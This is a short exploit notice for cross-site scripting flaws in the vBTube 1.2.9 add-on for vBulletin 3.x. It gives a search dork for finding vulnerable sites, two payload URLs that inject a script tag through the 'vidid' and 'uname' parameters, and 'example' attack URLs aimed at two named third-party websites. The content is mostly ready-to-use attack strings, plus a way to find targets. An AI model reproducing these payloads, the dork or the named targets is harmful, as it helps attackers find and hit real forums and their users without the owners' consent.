vBulletin version 3.x.x with the vBTube version 1.2.9 add-on suffers from multiple cross site scripting vulnerabilities.
e7f22f85242668c8be470d27ff17b6110ad159892ef6a775b8c5c662c0fc2ff9
[~] Author : Mr.ThieF <~
[~] Contact : Mr.ThieF@yahoo.com <~
[~] DorK : inurl:vBTube 1.2.9
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=173083
[~] Version : 3.x
[~] Exploit :
http://[site]/[path]/vBTube.php?do=view&vidid="><script>alert(1);</script>
http://[site]/[path]/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
[~] Example :
http://www.magicalproteachings.com/cy/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
http://www.rchelicoptertown.com/forum/vBTube.php?do=view&vidid=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
Done ..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~